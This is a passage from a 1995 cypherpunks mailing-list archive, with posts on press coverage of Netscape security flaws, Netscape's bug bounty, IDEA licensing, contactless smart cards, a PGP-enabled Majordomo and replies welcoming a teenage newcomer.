6xpNiNi3eIG3C8STX+ca+L0iglxi0pBz5vNuXL3KRZRqItETBTsncCvj8nCdZwrP
xfXjiVOs15k=
=Jc44
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David HM Spector <spector@zeitgeist.com>
Date: Thu, 12 Oct 95 18:20:14 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Pine.3.89.9510121633.A6162-0100000@offshore.com.ai>
Message-ID: <199510130119.VAA02267@zeitgeist.zeitgeist.com>
MIME-Version: 1.0
Content-Type: text/plain




The real problem seems to be that Markoff (with whom I have spoken
often in the past, and is actually *IS* a competent reporter -- usually)
seems to have taken a number of interviews with various people and
combined them, out of order with no real context into an Internet
boogey-man story.

The reason I say this is simply from the quotes by Jeff Schiller (and
the "Netscape spokesman") -- they were most certainly talking about
the recent discovery of problems with Netscape.  The "NFS" silliness,
and the thought that NFS is the mechanism by which  Internet  users
download files seems to been have stiched in for the scare value.
(We won't even get into the real-time file hijacking, etc.)

I am suprised that Jeff Schiller isn't all over this (and other lists)
spitting bullets considering the way he was (mis)quoted.

On the other hand, it could well be that John wrote a different story
and his *editors* at the NY Times decided with, um, how to put this
delicately... re-ordered the story.. um, er I mean edited it.  It
happens all the time to make stories more "effective."  (Most old
newpaper folks are scared to death of this technology and take what
swipes at it they can, whenever they can.)

BTW: If you're really unhappy with Markoff, let him know what you
think of his reporting... his email addresses used to be:

	       markoff@nyt.com and johnm@well.sf.ca.us
	

regards,
  David


PS: Whatever I just said is my opinion, which should be obvious, since
its coming from my home machine(s) which are funded by me
personally... and not whomever I happen to work for from 9 to 5...

PPS: BTW John, in case you're reading this, (and anyone else) you DO
NOT HAVE PERMISSION TO QUOTE ME... period!  In fact, this posting is
Copyright (c) 1995 by David HM Spector and may not be reprinted in
whole or in part without my express written permission.  I have a
copyright lawyer; she's really good, on retainer, and loves a good
brawl....
-----------------------------------------------------------------------------
David HM Spector				Software Developer & Nice Guy
http://zeitgeist.com				spector@zeitgeist.com
voice: +1 212.721.6974				fax: +1 212.721.9084
                               --------
SJM, 32, seeks SJF for meaningful rel... What? This ISN'T the VOICE personals?!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 18:25:49 PDT
To: cypherpunks@toad.com
Subject: Netscape beta 2.0
Message-ID: <m0t3YoM-000K8BC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        For Finding a security bug in Netscape, is it true you only get a
measly shirt? if that is true why not just start a virus?  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 18:35:43 PDT
To: JonathanZ@consensus.com (Jonathan Zamick)
Subject: Re: IDEA algorithm
In-Reply-To: <v02120d01aca45743fb66@[157.22.240.13]>
Message-ID: <199510130138.VAA08180@homeport.org>
MIME-Version: 1.0
Content-Type: text



| This may be an odd question, but who is it that owns the IDEA algorithm?
| 
| We've had a number of requests regarding licensing RSAREF tying into
| legitmizing PGP products. Part of that includes IDEA obviously.

	Dr Peter Profos
	Ascom-Tech AG, Solothurn Lab
	Postfach 151
	4502 Solothurn, Switzerland
	v. +41 65 242 885
	fax _41 65 235 761

	Now go buy a copy of Applied Cryptography, which answers this
and other questions you might have. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 18:46:09 PDT
To: cypherpunks@toad.com
Subject: Security
Message-ID: <m0t3Z7g-000KAPC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        In response to Aleph ones message Nothing is totally secure....The
only security on the internet is being off-line....We can just make it
harder to hack but hackers evolve and adapt.......






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@netcom.com (Ed Carp)
Date: Thu, 12 Oct 95 22:06:55 PDT
To: cypherpunks@toad.com
Subject: looking for anti-tamper software
Message-ID: <199510130455.VAA29233@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I used to have this C source that I could embed in a program, and it
would tell me if the software had been tampered with at runtime.  I've
lost/mislaid/whatever the source, and I was wondering if anyone had anything
that would do the same thing.  As I recall, it calculated a simple CRC and
embedded it into the .EXE file (it was written for MS-DOS).

It doesn't need to be cryptographically secure - I just need to check to see
if the executable has been corrupted.  I've leafed through alt.sources and
comp.sources.*.

Thanks in advance...
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 21:59:36 PDT
To: cypherpunks@toad.com
Subject: The Economist on Netscape "hackers"
Message-ID: <199510130458.VAA16480@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Looks like every cypherpunk's favorite newsweekly has slipped a
bit.

   This week's Economist (Oct 7-13, 1995, pp. 77-78) has a story about
banks getting on the Internet, and some of the security risks
involved. It's not _too_ bad, but, well, judge for yourself:

   "By far their biggest worry, however, is the threat posed by
computer hackers. In recent months, numerous defects have been
detected in the state-of-the-art Navigator program developed by
Netscape, the leading maker of Internet ``browsing'' software. Earlier
this year, a French hacker broke the program's code, albeit with the
help of 120 computers. Although Netscape claims that the glitches in
Navigator have now been smoothed out, their very existence has shaken
confidence. ..."

   Sigh. No mention of export restrictions (I wanted to add "of
course," but for the Economist it shouldn't be an "of course"). Shall
I write the letter to the editor, or does someone else want to? One
thing I'll need is a brief outline of Damien Doligez's acheivements to
support the idea that characterizing him as a "hacker" is not quite
right.

Raph (who's wondering if there's something inherent in the media
process that keeps them from getting their stories straight)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 12 Oct 95 22:07:56 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
Message-ID: <9510130504.AA17156@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: zoetrope@infinet.com
> 
> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?
> 
For the cyphergroupies of course...they rule!  Some day I'm going to write
a book about the better known, shall I say "famous" ones, and then I'll
be a bazillionaire...oh yeah, that's the other reason I'm on cypherpunks,
to get rich!  (Did I mention fame?)  And they serve a great breakfast too!
You can get anything you want at the cypherpunks restaraunt, ta da da da da
da da, you can...help me help me Mr. Blobby, I think my neural nets are
insufficiently trained! Bzzzt!

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 12 Oct 95 22:11:38 PDT
To: sameer <sameer@c2.org>
Subject: Re: Netscape beta 2.0
In-Reply-To: <199510130224.TAA04729@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951012215735.29068F-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 12 Oct 1995, sameer wrote:

> Hey those shirts aren't measly! They're high quality Fruit of
> the Loom shirts, limited edition, etc. etc. 

Well, I think "cyberpunc X" (give me a break) may have suggested
(inadvertantly) Sameer's next T-shirt motto:

       			 I CRACKED MS STT
			 AND ALL I GOT WAS
			THIS MEASLY T-SHIRT


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 12 Oct 95 22:10:43 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
Message-ID: <199510130510.WAA17526@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 10/12/95 -0400, you wrote:
>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

Cryptography can cause far more interesting kinds of havoc than scaring
a few marketroids about crackers cracking their market shares,
or scaring a few spooks that they might not be able to eavesdrop on
the American public.  Cryptography is a way of changing the balance of
power about who owns your personal information.  Computers are very good
at centralizing and combining information - once something's in a major
database,
it's easy for the people who own databases to compare them with other databases,
so your Social Security Number and Driver's License Number and credit cards
and phone numbers and TRW credit report all pretty much tell people what
you're doing, what kind of lifestyle you lead, where you're travelling,
what magazines you read, where to find you if they want, where your money is,
what kind of junk mail to send you, whether your house is worth burglarizing,
whether you'd be a good target for the draft or a tax audit, etc.
Not much you can do about it except not give people information,
and that's getting tougher to do, especially if you like conveniences of
modern American life like employee-style jobs and renting or buying houses
or having a driver's license when the cops stop your car for no good reason.

But with cryptography, you can structure transactions so that people get all
the information they need to do business with you (if you want them to),
and none of the information they don't need.  Imagine if your credit smart-card
didn't have your name on it (because only you have the PIN), and gave out a
different number every time you used it (but Visa doesn't mind, because
they know who you are.)  Imagine if, instead of having one master SSN that you
write on every bloody form you fill out in your life, you have a list of
tax id numbers, and can get more if you need them, so everybody who needs
to send the IRS a chunk of your money can do so, but the numbers aren't tied
together
except back at the tax office, where nobody's going to care until you retire.
(That doesn't even take cryptography, though it helps.)  Imagine if people
started thinking that your own private information was your own, and didn't
_need_ to see three kinds of picture ID to let you rent a mailbox or a car,
because you could use crypto methods to give them the information they need
to charge you for the car if you rip it off, without all the other baggage.

And imagine if all you need to do business is that barcode tattooed on your arm,
which you can wave by the machines anywhere you go, for everything you do.
Crypto's the alternative.

=====
Now, as far as the things you first asked about go, the theoretical stuff
_is_ pretty neat, and has finally given me an excuse to go study up on
number theory, and scaring the public about weaknesses of the computer
products they use is something the mass media and legislators like better 
than many of us do (though having your friends get their pictures in
Wired and the New York Times is kind of fun...) - it'd be nice if the
people who make popular software would take security seriously,
instead of putting out some of the thoughtlessly weak stuff that they do.
Sometimes it takes a 2x4 to do the job; sometimes the press just overreacts.

I do occasionally hang out with people who have the police watch them
because their politics aren't correct (whether to the left, right, or deep
center),
or because they like recreational chemicals that are safer than tobacco
and alcohol, or just because they're weird.  That's wrong, and people
have a right to their privacy.  (Hasn't stopped me from offering the
Philadelphia Police Red Squad coffee when they were watching a convention
I was at (they'd brought their own :-) - but those guys really still are
in business.)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael James Gebis <m-gebis@students.uiuc.edu>
Date: Thu, 12 Oct 95 20:14:21 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510130314.WAA12586@ux5.cso.uiuc.edu>
MIME-Version: 1.0
Content-Type: text/plain


In uiuc.mlist.cypherpunks zoetrope writes:

>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

_I_ got into it for the chicks.  Upon reflection it seems that it may not
have worked as well as I might have hoped. :)

-- 
Mike Gebis  m-gebis@uiuc.edu    Mean people suck.
http://www.uiuc.edu/ph/www/m-gebis/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 12 Oct 95 19:29:07 PDT
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <199510122211.PAA24518@kiwi.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.951012222710.16322B-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995, Raph Levien wrote:

> I pointed the latest beta (Solaris 2.4) towards this URL:

Security or no, I can't take Java seriously if it is only going to run on 
Solaris and not SunOS...

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 19:34:09 PDT
To: cypherpunks@toad.com
Subject: T-Shirts
Message-ID: <m0t3ZsP-000KBCC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        Ya but a multi million dollar corp like netscape should be paying
big bucks for those bugs....Or the mob might...ya get my drift....Alot of
people give personalized T-shirts but not everyone can jeapordize a corps
existed?



                 Waiting a reply,



                                    CyberPunc X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 19:47:58 PDT
To: JonathanZ@consensus.com (Jonathan Zamick)
Subject: Re: IDEA algorithm
In-Reply-To: <v02120d07aca4c6d130f2@[157.22.240.13]>
Message-ID: <199510130250.WAA08368@homeport.org>
MIME-Version: 1.0
Content-Type: text


| (Btw... what would be the absolute coolest thing folk would like to see
| added to RSAREF? That is, other than code that we will need to negotiate
| for. What new thing, speed upgrade, enhancement, etc would just tickle?)

	Consistant pricing.  The knowledge that any app I develop
using RSAREF can be made into licensed for commercial use product for
a set, known, published fee.  This would be the biggest win for
Consensus.

	Another really big win would be to add more entry points to
the code to legitimize Wei Dai's excellent Crypto++ library, which has
to jump in at all sorts of unpublished interfaces.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 12 Oct 95 23:03:04 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape beta 2.0
In-Reply-To: <m0t3YoM-000K8BC@mail.infinet.com>
Message-ID: <307E0031.3FFD@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


zoetrope@infinet.com wrote:
> 
>         For Finding a security bug in Netscape, is it true you only get a
> measly shirt? if that is true why not just start a virus?

  If you are the first to find a severe security bug in Netscape,
we will send you a check for $1000.  You can see the rules on
our web site.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 20:03:52 PDT
To: cypherpunks@toad.com
Subject: Re: T-Shirts
Message-ID: <m0t3aLG-000KBhC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain



>Read http://home.netscape.com/newsref/pr/newsrelease48.html, announced here
>a scant two days ago, then rephrase your question....
>
>-Futplex <futplex@pseudonym.com>
>
>
Thanks to a referall by futplex I see the error in my question....
Netscape is infact offering money and other freebees but some Kevin Mitnick
would rather have fun with it like messing with netscape or wait for the
Final v.2.0 to come out then have alot of fun!!!


anyway thanks again Futplex,
               the one and only,
                       CyberPunc X
                                  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 12 Oct 95 15:00:23 PDT
To: cypherpunks@toad.com
Subject: Smart Card Target
Message-ID: <199510122200.XAA05917@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Partnership Targets Billion Dollar Smart Card Market 


Denver, October 11 -- Racom Systems Inc. has entered into
a multi-million dollar partnership with Rohm Co. Ltd, a
Japanese company, to manufacture the ferroelectric chips
used in contactless, battery-free smart cards. The deal
also calls for Rohm to manufacture a new generation of
advanced microprocessor-based chips currently under
development for use in high-security financial
applications.

Rohm is currently starting up a new 0.6 micron wafer
fabrication operation in Kyoto, Japan, dedicated to the
high-volume manufacture or ferroelectric chips, and has
licensed Racom's contactless, battery-free technology
specifically for the Japanese market. Racom said the
cards are already in use in over 100 installations
worldwide.

Racom spokesperson Laura Keane said the
ferroelectric-based smart cards, which exchange
information with readers via radio waves instead of being
passed through a reader like a credit card, are used for
electronic ticketing: automatic fare collection on
buses, subways and trains, electronic point-of-sale, and
electronic benefits transfer.

Racom said the new cards are superior to the earlier
smart cards that use conventional semiconductor
technologies because of their unique combination of
high-speed, low-power, non-volatile operation, and high
reliability.

The new smart cards have the ability to store as many as
16 different accounts, said Keane. It could hold your
checking account, credit card account, let you pay for a
bus or train ticket, and allow you access to controlled
areas within your workplace.

Keane spoke about some of the card's advantages. In
automatic fare collection, users no longer have to carry
the correct change or tokens, waiting times to board are
reduced, and the risk of robbery of bus, subway and train
operators is reduced since they have less cash on board.

"It's a stored value card," said Keane. "You put money on
the card and daily as you use it you wave it over an
antenna and it deducts the fare for that day."

Keane said electronic ticketing primarily benefits the
frequent traveler. The user would simply wave their card
over an antenna at a kiosk in the terminal after
selecting their destination and class of accommodation
for immediate ticketing. The card would have your seating
preference and frequent flyer number recorded and would
provide that information to the ticket machine.

According to Jerome Svigals, publisher of Smart Cards &
Comments and a consultant to the electronic banking
industry, contactless technology is very valuable to the
user because of its speed, convenience, ease of use, low
cost and perhaps most importantly its security. "Even
more significant is this smart cards' ability to manage
multiple applications with contactless technology that
ensures the highest long-term data integrity, especially
important for electronic purse requirements," said the
industry consultant.

Press contact: Laura Keane, Racom Systems, 800-789-7627;
Public contact: 800-789-7627.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 20:05:22 PDT
To: cypherpunks@toad.com
Subject: 90%
Message-ID: <m0t3aMe-000KBGC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Can I ask a question....are you guys into cryptology for the interesting
facts and knowledge or fer cracking unix codes and raising havoc?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 12 Oct 95 23:05:40 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <199510122211.PAA24518@kiwi.cs.berkeley.edu>
Message-ID: <307E00CD.CF7@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Thomas Grant Edwards wrote:
> 
> On Thu, 12 Oct 1995, Raph Levien wrote:
> 
> > I pointed the latest beta (Solaris 2.4) towards this URL:
> 
> Security or no, I can't take Java seriously if it is only going to run on
> Solaris and not SunOS...
> 
> -Thomas

  Netscape Navigator 2.0 does support Java on SunOS.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 22:53:34 PDT
To: cypherpunks@toad.com
Subject: Re: Welcome to the list
Message-ID: <aca34b3d0702100476b5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 AM 10/13/95, Rich Salz wrote:
>You will probably find it most helpful to read through a few months
>archives of the list (ask around for back digests, usenet access, etc).
>And read the Tim's cyphernomicon.  You'll find most intro-level answers
>there, and you're less likely to annoy the natives. :)

Thanks, Rich, for the mention of my extremely long FAQ, available (if
you're lucky and Netcom isn't too jammed up) at ftp.netcom.com in
/pub/tc/tcmay, as "CP-FAQ." Also in compressed forms.

A better version is the Web version at;

http://www.oberlin.edu/~brchkind/cyphernomicon/

(And there are a couple of other sites that have it.)

It is very long, and doesn't include specific things about the Netscape
hack, the au courant topic, but it does have a lot of history, background,
motives, and interesting (to me at least) applications/implications.

(The problem with most FAQs is that that they're either too basic, or too
long. I opted for the encycopedic, figuring people could use search tools.
Even so, lots of topics don't get enough coverage.)

The best way to get rolling with the Cypherpunks list is, I think, to do
what Rich says. Read for a while, look at the archives, get a copy of
Schneier's book and maybe a few others (Bamford, Kahn, the Springer-Verlag
books, etc.), and find an area that interests you.

--Tim May




Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 20:24:39 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: Aquaria wars ?
In-Reply-To: <9510121708.AA00880@elysion.eiss.ira.uka.de>
Message-ID: <199510130324.XAA14630@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hadmut Danisch writes:
> Some (many) years ago there was a very large and long flamewar at the
> usenet. As far as I know it was called "The Aquaria Wars" because it
> began with a debate about the question whether the newsgroup should be
> named "alt.aquaria" or "alt.aquarium". I am looking for historical
> informations about this flamewar.

That was before my time, but I've certainly heard about it. Check out the
entry for Richard Sexton in Part 4 of Dave DeLaney's excellent Net.Legends FAQ.

(I can't seem to find an _accessible_ HTML copy of it right now, just
several broken ones, but 
ftp://rtfm.mit.edu/pub/usenet/news.answers/net-legends-faq/part4 works.)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Oct 95 23:17:15 PDT
To: cypherpunks@toad.com
Subject: Who has Copies of the "Internet Handbook"
Message-ID: <aca350ab09021004bd3c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:36 AM 10/13/95, Nesta Stubbs wrote:
>On Thu, 12 Oct 1995 zoetrope@infinet.com wrote:
>
>> Can I ask a question....are you guys into cryptology for the interesting
>> facts and knowledge or fer cracking unix codes and raising havoc?
>>
>If you look on pg. 34 of the handbook, Sect. 97.A13 says that this list
>is primarily for passing child porn and dirty limericks in unbreakable
>codes.  You really should read your Internet Handbook before asking these
>questions.  You Internet Service Provider DID give you the Official
>Internet Handbook right?

Many of us tried to get copies before the Great Handbook Renaming (*), but
were unable to. My sysadmins at Portal, then Netcom, kept promising it
would be made available, but I never saw it. In most jurisdictions the
"Internet Handbook" is simply not available.

Can't somebody make it available via an anonymous remailer? Surely they
can't be watching _all_ of the time?

In any case, as I understand things, all mentions of Cypherpunks were taken
out of the Handbook in 1993.

--Klaus!

(* For the newbies, the Internet Handbook used to be known as "The
Protocols of the Elders of the Arpanet," but the name was changed in the
Great Renaming. It was considered controversial even back in 1973 when I
got my first Arpanet account.)





Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Thu, 12 Oct 95 20:59:38 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <Pine.SUN.3.91.951012235716.16515A-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995 zoetrope@infinet.com wrote:

> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?

I am into cryptology for freedom and privacy.  If it takes "cracking a few
unix codes" to make people realize that we do not have good security right
now and we need better crypto products and we need to fight government laws
that hamper crypto development in this country, so be it. 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 21:15:04 PDT
To: cypherpunks@toad.com
Subject: Flame Wars
Message-ID: <m0t3bS9-000K5HC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        I am sorry if I have annoyed or offended anyone here, It was not my
intention of course......I dont want to hold any grudges especially with
Sameer....I havent done much cracking and have alot of questions I bet alot
of you had when you were 13 anyway zoetrope as in coppolla's
studio....again sorry If I offended or annoyed you....



                Sincerely,
                      CyberPunc X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Fri, 13 Oct 95 00:12:42 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Flame Wars
In-Reply-To: <199510130601.CAA23061@jekyll.piermont.com>
Message-ID: <Pine.LNX.3.91.951013000634.32151A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain


> However, if you are really are that young your questions are
> understandable, as was your manner. I got started in computers when I
> was about eleven many, many years ago, and I remember what its like
> when you know more than most adults about technology but don't quite
> know how to interact with other technical people yet. (I also remember
<g> I remember it to.. and it was only 15 years ago.. sheesh, where has 
the time gone..

> 
> reasons for what we do. However, many of us are interested in the
> topic for political reasons. We view cryptography as a way to ensure
> freedom and privacy for people around the world, and we try to advance
Hell, to be honest, I don't even fathom 1/2 of what is said around here.. 
but I understand the need to encrypt, have trained myself to use PGP, and 
am polically active.. I mainly use the list for a who's who of crypto and 
a referance guide to whats going on in the field.. <g>

> 
> If you are interested in cryptography and in learning a bit about what
> we do, I suggest that you first read a good introductory book on
> cryptography like Bruce Schneier's "Applied Cryptography" (which is
> coming out in a new edition in only a few weeks) and that you listen

Trust me on this one.. I was the newbie a couple of months ago and 
stepped into it pretty big for my first time out.. Afterwards (of course)
I read the Faq's, and have lurked a lot since.. take this list slow, as 
it will eventually pay out in the info you are looking for..

-Greets to the newer newbie-

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 12 Oct 95 21:23:11 PDT
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Smart Card Target
In-Reply-To: <199510122200.XAA05917@utopia.hacktic.nl>
Message-ID: <Pine.OSF.3.91.951013002405.22760A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone REALLY want to carry a card that could be sucked dry by 
radio? "Not I", said the little red hen!

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com
Date: Thu, 12 Oct 95 21:33:12 PDT
To: cypherpunks@toad.com
Subject: hardware
Message-ID: <m0t3bje-000K6bC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        is there any Hardware involved in cryptology and code hacking other
than a comp andf some accelerator chips?

                                CyberPunc X






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Thu, 12 Oct 95 21:28:34 PDT
To: cypherpunks@toad.com
Subject: Majordomo & PGP
Message-ID: <199510130430.AAA28277@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's something that might be of interest.....

Bob

Date: Thu, 12 Oct 1995 12:01:00 -0400
Message-Id: <9510121601.AA14372@hawww.ha.osd.mil>
To: cwilson@slurp.neu.sgi.com, majordomo-workers@GreatCircle.COM
Subject: PGP'ger-rated Majordomo ready for testing/comments
Sender: majordomo-workers-owner@GreatCircle.COM
Precedence: bulk


I've just finished integrating PGP into Majordomo 1.93.  I would like some
feedback on it's ease of use, functionality etc, so I may improve it before
releasing the code to the Public.  And there's always that doco thing...
Should be ready by months end.

If secure 'domo administration or secure distribution is of interest to you,
send the following commands in an email body to Majordomo@hawww.ha.osd.mil:

        help            <-- not the usual stuff.  better read it.
        info pgptest
        info pgpdomo-announce

If you are a PGP user, please subscribe to pgptest@hawww.ha.osd.mil.  This is
a PGP protected test list that needs a workout.  I'll spew pieces of my code
to pgptest for people to review.

Any comments, bug reports, oversights, anything (except money), please forward
to phollins@hawww.ha.osd.mil.

Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 12 Oct 95 21:33:02 PDT
To: privsoft@ix.netcom.com (Steve Orrin)
Subject: Re: responce to graphic encryption replies
In-Reply-To: <199510121733.KAA18977@ix7.ix.netcom.com>
Message-ID: <199510130432.AAA14986@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Steve Orrin writes:
> Also, I have recently put together an info sheet on the Security provided 
> by PrivaSoft which I can post if there is interest. 

I for one am interested. Perhaps you could put it up on your web pages ?

[...]
>     One of the key strengths, as I see it, of graphic encryption is 
> that during decryption via hacking, there is an added time element when 
> a human interface is required to verify the product, ( since it is a 
> graphic picture being produced, regular checksums for intelligible 
> words can't be used sans implementing OCR), even if this is only 10 
> milliseconds per try this is increases the time to crack 

This is an interesting point I hadn't previously considered. Can anyone
